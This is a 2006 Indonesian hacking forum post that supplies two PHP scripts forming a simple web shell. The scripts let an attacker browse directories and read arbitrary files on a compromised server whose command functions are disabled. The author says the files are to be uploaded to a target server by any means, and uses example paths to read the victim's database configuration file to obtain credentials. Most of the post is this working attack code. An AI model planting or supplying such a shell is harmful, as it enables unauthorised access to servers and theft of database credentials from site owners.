|
|
|
Browsing Folder server tanpa fungsi cmd()
|
Date: Thursday, April 27, 2006
Hits: 4156
By: anstellwinkel
|
Setelah cukup lama (maklum newbies) mencari ide bagaimana mengakali server yang mematikan fungsi cmd()
New Page 1
....untuk melihat isi dari folder dan membaca isi file-nya, karena hal ini
penting untuk mendapatkan konfigurasi database dari target (digunakan pada
script expolit database via PHP script) maka saya membuat script sederhana
(hanya untuk membaca folder dan isi dari file) dengan PHP ...saking sederhananya
mungkin rekan-rekan lainnya sudah tahu (saya aja yang telat nih kayanya)
OK ... langsung saja ... script ini terdiri dari 2 buah file php
1. bukadir.php
2. baca.php
isi script
bukadir.php
<html>
<head>
<title>:..: Membaca Isi Folder by anstellwinkel :..:</title>
</head>
<body bgcolor="#666666">
<?php
if(!$Submit) {
echo "<center>DOCUMENT ROOT : $DOCUMENT_ROOT";
?>
<form name="hackdir" method="post" action="">
<table width="500">
<tr bgcolor="#000000">
<td width="112">Masukkan Path : </td>
<td width="300"><input name="dir" type="text" id="dir" size="50"></td>
</tr>
</table>
<input type="submit" name="Submit" value="Submit">
</form>
<a href="admindb.php">halaman muka</a>
<?php
}
else {
echo "<center>
path $dir.<p>";
$path = $dir;
$dir = opendir("$dir");
?>
<textarea cols="40" rows="25">
<?php
while ($baca = readdir($dir))
print("$baca \n");
closedir($dir);
?>
</textarea><br>
<br>Melihat Isi File
<form name="hackdir" method="post" action="baca.php">
<table width="475">
<tr bgcolor="#000000">
<td width="130">Masukkan nama file : </td>
<td width="320">
<input name="path" type="text" id="path" size="50" value="<? echo $path
?>"></td>
</tr>
</table>
<input type="submit" name="Submit" value="Submit">
</form>
<a href="admindb.php">halaman muka</a>
<?php
}
?>
</body>
</html>
pada script ini kita memasukkan path dari target berdasarkan document
root-nya
contoh :
DOCUMENT ROOT : ../../public_html/
Masukkan Path : /home/target_folder/public_html/
isi script
baca.php
<html>
<head>
<title>:..: Membaca Isi File by anstellwinkel :..:</title>
</head>
<body bgcolor="#666666">
<?php
if($Submit) {
$nama_file = "$path";
$isi_file = file($nama_file);
$jml_baris = sizeof($isi_file);
echo "<center>File $nama_file berisi $jml_baris baris.<p>";
?>
<textarea cols="80" rows="25">
<?php
for ($i=0; $i<$jml_baris; $i++)
{
print "$isi_file[$i]";
}
?>
</textarea></center>
<?php
}
?>
<a href="bukadir.php">kembali</a>
pada script ini masukkan nama file yang akan dilihat isinya
contoh :
Masukkan nama file : /home/target_folder/public_html/configdb.php
dan sebagai catatan script ini harus diupload keserver target....caranya
terserah anda!!!!
fungsi dari script ini untuk mendapatkan file konfigurasi database target
Ok!!!...sepertinya hanya ini aja ... untuk download script lengkapnya saya
gabungkan dengan
script saya yang pertama (expolit database via php script) di
http://www.geocities.com/anstellwinkel/request.rar
Cya...by anstellwinkel at
anstellwinkel(@)yahoo.com.au
|
|
| Source: JASAKOM Information Center |
|
|
|
|
|